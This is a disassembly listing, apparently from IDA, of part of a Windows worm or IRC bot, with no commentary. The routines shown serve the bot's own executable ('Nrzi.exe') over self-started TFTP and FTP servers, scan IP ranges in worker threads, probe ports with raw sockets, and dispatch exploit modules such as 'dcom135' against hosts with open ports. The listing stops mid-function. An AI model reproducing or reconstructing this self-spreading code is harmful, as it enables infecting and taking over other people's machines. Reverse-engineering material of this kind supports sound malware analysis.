; int __cdecl sub_404F31(int, int, int, int, char Source, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, char, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int)
sub_404F31 proc near ; CODE XREF: sub_405A2E+56�p
ThreadId = dword ptr -204h
Dest = byte ptr -200h
Source = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
push ebp
mov ebp, esp
sub esp, 204h
cmp [ebp+arg_130], 0FFFFFFFFh
jz locret_405252
mov eax, [ebp+arg_130]
imul eax, 3Ch
cmp dword_41EDA4[eax], 0
jz loc_4050D1
push 4
call sub_4105E0
pop ecx
test eax, eax
jnz loc_4050D1
mov ax, word_421C38
mov word_425E74, ax
and dword_425E70, 0
push 104h ; nSize
push offset Filename ; lpFilename
push 0 ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
push 103h ; Count
push offset String2 ; "Nrzi.exe"
push offset byte_425D68 ; Dest
call _strncpy
add esp, 0Ch
mov eax, [ebp+arg_110]
mov dword_425C60, eax
mov eax, [ebp+arg_138]
mov dword_425EF8, eax
movsx eax, [ebp+arg_90]
test eax, eax
jnz short loc_404FE9
push 7Fh ; Count
lea eax, [ebp+Source]
push eax ; Source
push offset byte_425E76 ; Dest
call _strncpy
add esp, 0Ch
mov dword_425EFC, 1
jmp short loc_405006
; ---------------------------------------------------------------------------
loc_404FE9: ; CODE XREF: sub_404F31+97�j
push 7Fh ; Count
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_425E76 ; Dest
call _strncpy
add esp, 0Ch
and dword_425EFC, 0
loc_405006: ; CODE XREF: sub_404F31+B6�j
push offset byte_425D68
push offset Filename
movzx eax, word_425E74
push eax
push dword_425C60
call sub_40892F
pop ecx
push eax
push offset aTftpdServerSta ; "[TFTPD]: Server started on IP: %s:%d, F"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 18h
push 0 ; int
push 4 ; int
lea eax, [ebp+Dest]
push eax ; Source
call sub_410231
add esp, 0Ch
mov dword_425E6C, eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push offset dword_425C60 ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, dword_425E6C
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, dword_425E6C
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_4050A9
loc_405094: ; CODE XREF: sub_404F31+174�j
cmp dword_425F00, 0
jnz short loc_4050A7
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_405094
; ---------------------------------------------------------------------------
loc_4050A7: ; CODE XREF: sub_404F31+16A�j
jmp short loc_4050C4
; ---------------------------------------------------------------------------
loc_4050A9: ; CODE XREF: sub_404F31+161�j
call ds:GetLastError
push eax
push offset aTftpdFailedToS ; "[TFTPD]: Failed to start server, error:"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_4050C4: ; CODE XREF: sub_404F31:loc_4050A7�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
loc_4050D1: ; CODE XREF: sub_404F31+26�j
; sub_404F31+36�j
push 5
call sub_4105E0
pop ecx
test eax, eax
jnz locret_405252
push 0 ; Time
call _time
pop ecx
push eax
call sub_412333
pop ecx
call _rand
cdq
mov ecx, 0FC17h
idiv ecx
add edx, 3E8h
mov dword_425BCC, edx
and dword_425BC8, 0
push 104h ; nSize
push offset byte_4259BC ; lpFilename
push 0 ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
push 103h ; Count
push offset String2 ; "Nrzi.exe"
push offset byte_425AC0 ; Dest
call _strncpy
add esp, 0Ch
mov eax, [ebp+arg_110]
mov dword_4259B8, eax
mov eax, [ebp+arg_138]
mov dword_425C50, eax
movsx eax, [ebp+arg_90]
test eax, eax
jnz short loc_405179
push 7Fh ; Count
lea eax, [ebp+Source]
push eax ; Source
push offset byte_425BD0 ; Dest
call _strncpy
add esp, 0Ch
mov dword_425C54, 1
jmp short loc_405196
; ---------------------------------------------------------------------------
loc_405179: ; CODE XREF: sub_404F31+227�j
push 7Fh ; Count
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_425BD0 ; Dest
call _strncpy
add esp, 0Ch
and dword_425C54, 0
loc_405196: ; CODE XREF: sub_404F31+246�j
push offset byte_425AC0
push offset byte_4259BC
push dword_425BCC
push offset aFtpServerStart ; "[FTP]: Server started on Port: %d, File"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 14h
push 0 ; int
push 5 ; int
lea eax, [ebp+Dest]
push eax ; Source
call sub_410231
add esp, 0Ch
mov dword_425BC4, eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push offset dword_4259B8 ; lpParameter
push offset sub_403C1E ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, dword_425BC4
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, dword_425BC4
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40522A
loc_405215: ; CODE XREF: sub_404F31+2F5�j
cmp dword_425C58, 0
jnz short loc_405228
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_405215
; ---------------------------------------------------------------------------
loc_405228: ; CODE XREF: sub_404F31+2EB�j
jmp short loc_405245
; ---------------------------------------------------------------------------
loc_40522A: ; CODE XREF: sub_404F31+2E2�j
call ds:GetLastError
push eax
push offset aFtpFailedToSta ; "[FTP]: Failed to start server, error: <"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_405245: ; CODE XREF: sub_404F31:loc_405228�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
locret_405252: ; CODE XREF: sub_404F31+10�j
; sub_404F31+1AA�j
leave
retn
sub_404F31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405254 proc near ; CODE XREF: sub_405759+AB�p
Dst = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 4 ; Size
mov eax, [ebp+arg_0]
lea eax, ds:424A00h[eax*8]
push eax ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+Dst]
call dword_42637C ; ntohl
mov [ebp+Dst], eax
mov eax, [ebp+Dst]
inc eax
mov [ebp+Dst], eax
push [ebp+Dst]
call dword_426420 ; ntohl
mov [ebp+Dst], eax
push 4 ; Size
lea eax, [ebp+Dst]
push eax ; Src
mov eax, [ebp+arg_0]
lea eax, ds:424A00h[eax*8]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, dword_424A00[eax*8]
leave
retn
sub_405254 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4052B5(char *Src, int)
sub_4052B5 proc near ; CODE XREF: sub_405759+8A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
or [ebp+var_4], 0FFFFFFFFh
or [ebp+var_8], 0FFFFFFFFh
or [ebp+var_C], 0FFFFFFFFh
or [ebp+var_10], 0FFFFFFFFh
push [ebp+Src] ; Str
call _strlen
pop ecx
cmp eax, 0Fh
jbe short loc_4052E0
xor eax, eax
jmp locret_405367
; ---------------------------------------------------------------------------
loc_4052E0: ; CODE XREF: sub_4052B5+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+Src] ; Src
call _sscanf
add esp, 18h
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_40530E
call _rand
mov [ebp+var_4], eax
loc_40530E: ; CODE XREF: sub_4052B5+4F�j
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_40531C
call _rand
mov [ebp+var_8], eax
loc_40531C: ; CODE XREF: sub_4052B5+5D�j
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_40532A
call _rand
mov [ebp+var_C], eax
loc_40532A: ; CODE XREF: sub_4052B5+6B�j
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_405338
call _rand
mov [ebp+var_10], eax
loc_405338: ; CODE XREF: sub_4052B5+79�j
mov eax, [ebp+var_8]
shl eax, 8
mov ecx, [ebp+var_4]
add ecx, eax
mov eax, [ebp+var_C]
shl eax, 10h
add ecx, eax
mov eax, [ebp+var_10]
shl eax, 18h
add ecx, eax
mov eax, [ebp+arg_4]
mov dword_424A00[eax*8], ecx
mov eax, [ebp+arg_4]
mov eax, dword_424A00[eax*8]
locret_405367: ; CODE XREF: sub_4052B5+26�j
leave
retn
sub_4052B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405369 proc near ; CODE XREF: sub_405759+12B�p
; sub_409D82+29B�p
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = word ptr -114h
var_112 = word ptr -112h
var_110 = dword ptr -110h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 12Ch
mov [ebp+var_124], 1
push 0
push 1
push 2
call dword_4264A0 ; socket
mov [ebp+var_128], eax
cmp [ebp+var_128], 0FFFFFFFFh
jnz short loc_40539E
xor eax, eax
jmp locret_4054BA
; ---------------------------------------------------------------------------
loc_40539E: ; CODE XREF: sub_405369+2C�j
mov [ebp+var_114], 2
mov eax, [ebp+arg_0]
mov [ebp+var_110], eax
push [ebp+arg_4]
call dword_426424 ; ntohs
mov [ebp+var_112], ax
lea eax, [ebp+var_124]
push eax
push 8004667Eh
push [ebp+var_128]
call dword_4264BC ; ioctlsocket
push 10h
lea eax, [ebp+var_114]
push eax
push [ebp+var_128]
call dword_4263D8 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_120], eax
and [ebp+var_11C], 0
and [ebp+var_104], 0
loc_405404: ; CODE XREF: sub_405369+113�j
and [ebp+var_12C], 0
jmp short loc_40541A
; ---------------------------------------------------------------------------
loc_40540D: ; CODE XREF: sub_405369:loc_40543F�j
mov eax, [ebp+var_12C]
inc eax
mov [ebp+var_12C], eax
loc_40541A: ; CODE XREF: sub_405369+A2�j
mov eax, [ebp+var_12C]
cmp eax, [ebp+var_104]
jnb short loc_405441
mov eax, [ebp+var_12C]
mov eax, [ebp+eax*4+var_100]
cmp eax, [ebp+var_128]
jnz short loc_40543F
jmp short loc_405441
; ---------------------------------------------------------------------------
loc_40543F: ; CODE XREF: sub_405369+D2�j
jmp short loc_40540D
; ---------------------------------------------------------------------------
loc_405441: ; CODE XREF: sub_405369+BD�j
; sub_405369+D4�j
mov eax, [ebp+var_12C]
cmp eax, [ebp+var_104]
jnz short loc_405478
cmp [ebp+var_104], 40h
jnb short loc_405478
mov eax, [ebp+var_12C]
mov ecx, [ebp+var_128]
mov [ebp+eax*4+var_100], ecx
mov eax, [ebp+var_104]
inc eax
mov [ebp+var_104], eax
loc_405478: ; CODE XREF: sub_405369+E4�j
; sub_405369+ED�j
xor eax, eax
test eax, eax
jnz short loc_405404
lea eax, [ebp+var_120]
push eax
push 0
lea eax, [ebp+var_104]
push eax
push 0
push 0
call dword_426410 ; select
mov [ebp+var_118], eax
push [ebp+var_128]
call dword_4264B8 ; closesocket
cmp [ebp+var_118], 0
jg short loc_4054B7
xor eax, eax
jmp short locret_4054BA
; ---------------------------------------------------------------------------
loc_4054B7: ; CODE XREF: sub_405369+148�j
push 1
pop eax
locret_4054BA: ; CODE XREF: sub_405369+30�j
; sub_405369+14C�j
leave
retn
sub_405369 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1011Ch
call __alloca_probe
mov word ptr [ebp-10044h], 2649h
push dword ptr [ebp-10044h]
call dword_426424 ; ntohs
mov [ebp-100F8h], ax
push dword ptr [ebp+10h]
call dword_426424 ; ntohs
mov [ebp-100F6h], ax
call _rand
mov [ebp-100F4h], eax
and dword ptr [ebp-100F0h], 0
and word ptr [ebp-100ECh], 0
and word ptr [ebp-100DCh], 0
mov word ptr [ebp-100EAh], 5
and word ptr [ebp-100E8h], 0
mov word ptr [ebp-100E6h], 1
and word ptr [ebp-100E4h], 0
and word ptr [ebp-100E2h], 0
and word ptr [ebp-100E0h], 0
and word ptr [ebp-100DEh], 0
push 200h
call dword_426424 ; ntohs
mov [ebp-100DAh], ax
and word ptr [ebp-100D8h], 0
and word ptr [ebp-100D6h], 0
mov eax, [ebp+8]
mov [ebp-1011Ch], eax
mov eax, [ebp+0Ch]
mov [ebp-10118h], eax
and byte ptr [ebp-10114h], 0
mov byte ptr [ebp-10113h], 6
push 24h
call dword_426424 ; ntohs
mov [ebp-10112h], ax
push 24h
lea eax, [ebp-100F8h]
push eax
lea eax, [ebp-10110h]
push eax
call _memcpy
add esp, 0Ch
push 20h
lea eax, [ebp-1011Ch]
push eax
call sub_40898A
pop ecx
pop ecx
mov [ebp-100D8h], ax
push 10h
push 0
lea eax, [ebp-100D4h]
push eax
call _memset
add esp, 0Ch
mov word ptr [ebp-100D4h], 2
push dword ptr [ebp+10h]
call dword_426424 ; ntohs
mov [ebp-100D2h], ax
mov eax, [ebp+0Ch]
mov [ebp-100D0h], eax
mov dword ptr [ebp-100FCh], 10h
push 6
push 3
push 2
call dword_4264A0 ; socket
mov [ebp-10040h], eax
cmp dword ptr [ebp-10040h], 0FFFFFFFFh
jnz short loc_40563D
push offset aSocketOpenFail ; "socket open failed"
call sub_40913D
pop ecx
xor eax, eax
jmp locret_405757
; ---------------------------------------------------------------------------
loc_40563D: ; CODE XREF: .text:00405629�j
push dword ptr [ebp-100FCh]
lea eax, [ebp-100D4h]
push eax
push 0
push 24h
lea eax, [ebp-100F8h]
push eax
push dword ptr [ebp-10040h]
call dword_426484 ; sendto
mov [ebp-1003Ch], eax
cmp dword ptr [ebp-1003Ch], 14h
jz short loc_4056B1
call dword_4263C8 ; WSAGetLastError
push eax
push dword ptr [ebp-1003Ch]
push offset aSendtoSocketFa ; "sendto() socket failed. sent = %d <%d>."...
lea eax, [ebp-100C4h]
push eax
call _sprintf
add esp, 10h
lea eax, [ebp-100C4h]
push eax
call sub_40913D
pop ecx
push dword ptr [ebp-10040h]
call dword_4264B8 ; closesocket
xor eax, eax
jmp locret_405757
; ---------------------------------------------------------------------------
loc_4056B1: ; CODE XREF: .text:0040566E�j
push 10038h
push 0
lea eax, [ebp-10038h]
push eax
call _memset
add esp, 0Ch
loc_4056C7: ; CODE XREF: .text:loc_405720�j
movzx eax, word ptr [ebp-10022h]
movzx ecx, word ptr [ebp-10044h]
cmp eax, ecx
jz short loc_405722
lea eax, [ebp-100FCh]
push eax
lea eax, [ebp-100D4h]
push eax
push 0
push 10038h
lea eax, [ebp-10038h]
push eax
push dword ptr [ebp-10040h]
call dword_426400 ; recvfrom
test eax, eax
jge short loc_405720
push offset aRecvfromSocket ; "recvfrom() socket failed"
call sub_40913D
pop ecx
push dword ptr [ebp-10040h]
call dword_4264B8 ; closesocket
xor eax, eax
jmp short locret_405757
; ---------------------------------------------------------------------------
loc_405720: ; CODE XREF: .text:00405703�j
jmp short loc_4056C7
; ---------------------------------------------------------------------------
loc_405722: ; CODE XREF: .text:004056D7�j
push dword ptr [ebp-10040h]
call dword_4264B8 ; closesocket
movzx eax, word ptr [ebp-10012h]
cmp eax, 1
jnz short loc_40574A
push offset aSocketOpen_ ; "Socket open."
call sub_40913D
pop ecx
push 1
pop eax
jmp short locret_405757
; ---------------------------------------------------------------------------
loc_40574A: ; CODE XREF: .text:00405738�j
push offset aSocketClosed_ ; "Socket closed."
call sub_40913D
pop ecx
xor eax, eax
locret_405757: ; CODE XREF: .text:00405638�j
; .text:004056AC�j ...
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_405759(LPVOID)
sub_405759 proc near ; DATA XREF: sub_405A2E+16E�o
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_288 = byte ptr -288h
var_208 = byte ptr -208h
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1F4 = dword ptr -1F4h
var_1EC = dword ptr -1ECh
var_1E8 = dword ptr -1E8h
var_1E0 = dword ptr -1E0h
var_1DC = dword ptr -1DCh
Dest = byte ptr -1D8h
var_158 = dword ptr -158h
var_154 = dword ptr -154h
Src = byte ptr -150h
var_140 = byte ptr -140h
Format = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
push esi
push edi
mov esi, [ebp+arg_0]
push 53h
pop ecx
lea edi, [ebp+Src]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_2C]
mov [ebp+var_1DC], eax
mov eax, [ebp+var_28]
mov [ebp+var_154], eax
call ds:GetTickCount ; GetTickCount
push eax
call sub_412333
pop ecx
loc_4057A4: ; CODE XREF: sub_405759+2B6�j
mov eax, [ebp+var_1DC]
imul eax, 234h
mov eax, dword_42B544[eax]
cmp dword_424A04[eax*8], 0
jz loc_405A14
cmp [ebp+var_10], 0
jz short loc_4057F2
mov eax, [ebp+var_1DC]
imul eax, 234h
push dword_42B544[eax] ; int
lea eax, [ebp+Src]
push eax ; Src
call sub_4052B5
pop ecx
pop ecx
mov [ebp+var_1E0], eax
jmp short loc_405810
; ---------------------------------------------------------------------------
loc_4057F2: ; CODE XREF: sub_405759+6F�j
mov eax, [ebp+var_1DC]
imul eax, 234h
push dword_42B544[eax]
call sub_405254
pop ecx
mov [ebp+var_1E0], eax
loc_405810: ; CODE XREF: sub_405759+97�j
mov eax, [ebp+var_1E0]
mov [ebp+var_158], eax
push [ebp+var_154]
mov eax, [ebp+var_1DC]
imul eax, 234h
push dword_42B544[eax]
push [ebp+var_3C]
push [ebp+var_158]
call dword_4264AC ; inet_ntoa
push eax
push offset aScanIpSDScanTh ; "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 18h
lea eax, [ebp+Dest]
push eax ; Format
mov eax, [ebp+var_1DC]
imul eax, 234h
add eax, offset byte_42B340
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_38]
push [ebp+var_3C]
push [ebp+var_1E0]
call sub_405369
add esp, 0Ch
cmp eax, 1
jnz loc_405A04
cmp [ebp+var_20], 0FFFFFFFFh
jnz loc_40593A
push offset CriticalSection ; lpCriticalSection
call ds:EnterCriticalSection
push [ebp+var_3C]
push [ebp+var_158]
call dword_4264AC ; inet_ntoa
push eax
push offset aScanIpSPortDIs ; "[SCAN]: IP: %s, Port %d is open."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_40591D
movsx eax, [ebp+Format]
test eax, eax
jz short loc_4058FF
push 0
push [ebp+var_18]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Format]
push eax
push [ebp+var_40]
call sub_40A08D
add esp, 14h
jmp short loc_40591D
; ---------------------------------------------------------------------------
loc_4058FF: ; CODE XREF: sub_405759+184�j
push 0
push [ebp+var_18]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_40]
call sub_40A08D
add esp, 14h
loc_40591D: ; CODE XREF: sub_405759+179�j
; sub_405759+1A4�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push offset CriticalSection ; lpCriticalSection
call ds:LeaveCriticalSection
jmp loc_405A04
; ---------------------------------------------------------------------------
loc_40593A: ; CODE XREF: sub_405759+140�j
push [ebp+var_158]
call dword_4264AC ; inet_ntoa
push eax ; Format
lea eax, [ebp+var_298]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aDcom135_0 ; "dcom135"
push eax ; Format
lea eax, [ebp+var_208]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
movsx eax, [ebp+Format]
test eax, eax
jz short loc_405991
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+var_288]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_4059A6
; ---------------------------------------------------------------------------
loc_405991: ; CODE XREF: sub_405759+21F�j
lea eax, [ebp+var_140]
push eax ; Format
lea eax, [ebp+var_288]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4059A6: ; CODE XREF: sub_405759+236�j
mov eax, [ebp+var_40]
mov [ebp+var_29C], eax
mov eax, [ebp+var_18]
mov [ebp+var_1EC], eax
mov eax, [ebp+var_14]
mov [ebp+var_1E8], eax
mov eax, [ebp+var_3C]
mov [ebp+var_1FC], eax
mov eax, [ebp+var_1DC]
mov [ebp+var_1F8], eax
mov eax, [ebp+var_20]
mov [ebp+var_1F4], eax
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+var_29C]
mov edi, esp
rep movsd
mov eax, [ebp+var_20]
imul eax, 3Ch
call off_41ED9C[eax]
add esp, 0BCh
loc_405A04: ; CODE XREF: sub_405759+136�j
; sub_405759+1DC�j
push 7D0h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp loc_4057A4
; ---------------------------------------------------------------------------
loc_405A14: ; CODE XREF: sub_405759+65�j
push [ebp+var_1DC]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
sub_405759 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_405A2E(LPVOID)
sub_405A2E proc near ; DATA XREF: sub_40ABFE+2CB6�o
; sub_40ABFE+4873�o
Source = byte ptr -1D8h
var_158 = dword ptr -158h
var_154 = dword ptr -154h
Parameter = byte ptr -150h
var_140 = byte ptr -140h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1D8h
push esi
push edi
mov esi, [ebp+arg_0]
push 53h
pop ecx
lea edi, [ebp+Parameter]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov dword ptr [eax+144h], 1
lea eax, [ebp+Parameter]
push eax
call dword_426460 ; inet_addr
mov ecx, [ebp+var_30]
mov dword_424A00[ecx*8], eax
sub esp, 14Ch
push 53h
pop ecx
lea esi, [ebp+Parameter]
mov edi, esp
rep movsd
call sub_404F31
add esp, 14Ch
push 8
call sub_4105E0
pop ecx
cmp eax, 1
jnz short loc_405B06
push offset CriticalSection ; lpCriticalSection
call ds:DeleteCriticalSection
push 80000400h ; dwSpinCount
push offset CriticalSection ; lpCriticalSection
call ds:InitializeCriticalSectionAndSpinCount ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_405B06
push offset aScanFailedToIn ; "[SCAN]: Failed to initialize critical s"...
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_14], 0
jnz short loc_405AF2
push 0
push [ebp+var_18]
lea eax, [ebp+Source]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_40]
call sub_40A08D
add esp, 14h
loc_405AF2: ; CODE XREF: sub_405A2E+A4�j
lea eax, [ebp+Source]
push eax
call sub_40913D
pop ecx
xor eax, eax
jmp loc_405CEC
; ---------------------------------------------------------------------------
loc_405B06: ; CODE XREF: sub_405A2E+6C�j
; sub_405A2E+8B�j
mov eax, [ebp+var_30]
mov dword_424A04[eax*8], 1
mov [ebp+var_158], 1
jmp short loc_405B2D
; ---------------------------------------------------------------------------
loc_405B20: ; CODE XREF: sub_405A2E+1E0�j
mov eax, [ebp+var_158]
inc eax
mov [ebp+var_158], eax
loc_405B2D: ; CODE XREF: sub_405A2E+F0�j
mov eax, [ebp+var_158]
cmp eax, [ebp+var_24]
ja loc_405C13
mov eax, [ebp+var_158]
mov [ebp+var_28], eax
push [ebp+var_28]
push [ebp+var_30]
push [ebp+var_3C]
lea eax, [ebp+Parameter]
push eax
push offset aScanSDScanThre ; "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"...
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
add esp, 18h
push 0 ; int
push 8 ; int
lea eax, [ebp+Source]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
imul eax, 234h
mov ecx, [ebp+var_30]
mov dword_42B544[eax], ecx
push 0 ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+Parameter]
push eax ; lpParameter
push offset sub_405759 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_2C]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_2C]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_405BDE
loc_405BCC: ; CODE XREF: sub_405A2E+1AC�j
cmp [ebp+var_8], 0
jnz short loc_405BDC
push 1Eh ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_405BCC
; ---------------------------------------------------------------------------
loc_405BDC: ; CODE XREF: sub_405A2E+1A2�j
jmp short loc_405C06
; ---------------------------------------------------------------------------
loc_405BDE: ; CODE XREF: sub_405A2E+19C�j
call ds:GetLastError
push eax
push offset aScanFailedToSt ; "[SCAN]: Failed to start worker thread, "...
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Source]
push eax
call sub_40913D
pop ecx
loc_405C06: ; CODE XREF: sub_405A2E:loc_405BDC�j
push 1Eh ; dwMilliseconds
call ds:Sleep ; Sleep
jmp loc_405B20
; ---------------------------------------------------------------------------
loc_405C13: ; CODE XREF: sub_405A2E+108�j
cmp [ebp+var_34], 0
jz short loc_405C2B
mov eax, [ebp+var_34]
imul eax, 0EA60h
push eax ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_405C45
; ---------------------------------------------------------------------------
loc_405C2B: ; CODE XREF: sub_405A2E+1E9�j
; sub_405A2E+215�j
mov eax, [ebp+var_30]
cmp dword_424A04[eax*8], 1
jnz short loc_405C45
push 7D0h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_405C2B
; ---------------------------------------------------------------------------
loc_405C45: ; CODE XREF: sub_405A2E+1FB�j
; sub_405A2E+208�j
mov eax, [ebp+var_30]
mov eax, dword_424A00[eax*8]
mov [ebp+var_154], eax
push [ebp+var_34]
push [ebp+var_3C]
push [ebp+var_154]
call dword_4264AC ; inet_ntoa
push eax
push offset aScanFinishedAt ; "[SCAN]: Finished at %s:%d after %d minu"...
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
add esp, 14h
cmp [ebp+var_14], 0
jnz short loc_405CA0
push 0
push [ebp+var_18]
lea eax, [ebp+Source]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_40]
call sub_40A08D
add esp, 14h
loc_405CA0: ; CODE XREF: sub_405A2E+252�j
lea eax, [ebp+Source]
push eax
call sub_40913D
pop ecx
mov eax, [ebp+var_30]
and dword_424A04[eax*8], 0
push 0BB8h ; dwMilliseconds
call ds:Sleep ; Sleep
push 8
call sub_4105E0
pop ecx
cmp eax, 1
jnz short loc_405CDB
push offset CriticalSection ; lpCriticalSection
call ds:DeleteCriticalSection
loc_405CDB: ; CODE XREF: sub_405A2E+2A0�j
push [ebp+var_30]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_405CEC: ; CODE XREF: sub_405A2E+D3�j
pop edi
pop esi
leave
retn 4
sub_405A2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405CF2 proc near ; CODE XREF: sub_405D52+167�p
; sub_405D52+38B�p
Dest = byte ptr -248h
hFindFile = dword ptr -144h
FindFileData = _WIN32_FIND_DATAA ptr -140h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 248h
push [ebp+arg_0]
push [ebp+arg_4]
push offset aSS_2 ; "%s\\%s"
push 104h ; Count
lea eax, [ebp+Dest]
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea eax, [ebp+Dest]
push eax ; lpFileName
call ds:FindFirstFileA ; FindFirstFileA
mov [ebp+hFindFile], eax
cmp [ebp+hFindFile], 0FFFFFFFFh
jz short loc_405D42
